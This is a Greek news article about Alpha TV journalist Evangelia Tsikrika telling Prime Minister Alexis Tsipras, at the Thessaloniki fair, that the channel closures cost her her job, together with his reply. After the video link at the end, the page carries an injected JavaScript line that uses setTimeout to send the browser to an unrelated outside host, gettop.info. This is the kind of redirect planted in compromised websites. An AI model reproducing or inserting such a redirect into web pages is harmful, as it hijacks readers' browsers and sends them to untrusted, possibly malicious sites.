Δημοσιογράφος Alpha: Πρωθυπουργέ, σας κοιτώ στα μάτια για να σας πω ότι με απολύετε από τη δουλειά μου (BINTEO)

0
16

 

Σας κοιτώ στα μάτια για να σας πω ότι με απολύετε απο τη δουλειά μου έπειτα από 21 χρόνία εργασίας στον Alpha, είπε η Ευαγγελία Τσικρίκα του Alpha στην ερώτησή της προς τον πρωθυπουργό στη ΔΕΘ. «Ήξερα πως μέχρι σήμερα απέλυαν οι εγοδότες όχι οι κυβερνήσεις» τόνισε.

Και συνέχισε: «Κάνουν λόγο ότι τα κανάλια λειτουργούσαν παράνομα. Δεν δίνατε συνεντεύξεις, δεν συμμετείχατε σε προεκλογικές εκπομπές σ’ αυτά τα κανάλια που σήμερα κλείνετε κι έχουν πληρώσει φόρους και εισφορές;»

«Τα κανάλια ζήταγαν άδεια και οι κυβερνήσεις δεν έδιναν» επέμεινε η δημοσιογράφος του Alpha και ρώτησε τον πρωθυπουργό: «Γιατί τιμωρείτε τους εργαζομένους σε ενα κανάλι που κέρδισε με το παραπάνω την εμπιστοσύνη των τηλεθεατών και κατέβαλε 61 εκατ. ευρώ για να αδειοδοτηθεί;»

Η απάντηση που πήρε από τον πρωθυπουργό ήταν: «Μας ενδιαφέρουν όλες οι θέσεις εργασίας. Δεν είστε οι μόνοι εργαζόμενοι στα πέντε χρόνια της καταστροφής στα μη αδειοδοτούμενα ΜΜΕ που καταφέρονταν εναντίον των εργαζομένων που έδιναν μάχη να κρατηθούν στις εργασίες τους» και επέμεινε:  «Δεν είχαν ψυχή οι 2.000 από τους 4.000 που έχασαν τη θέση τους; Δεν είχαν μανούλα να τους κλάψει αυτοί; Τώρα χύνουν κάποιοι υποκριτικά κροκοδείλια δάκρυα. Για τους εργαζομένους της ΕΡΤ δεν έκλαψε κανείς«.

«Το τζάμπα και το νταβατζηλίκι τελείωσε σ’ αυτήν τη χώρα» ολοκλήρωσε την απάντησή του ο Αλέξης Τσίπρας για να λάβει την απάντηση: «Σταθμός που καταβάλλει 61 εκατ. ευρώ για να πάρει άδεια δεν είναι τζάμπα«.

https://youtu.be/GVHY4-xSoW0 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here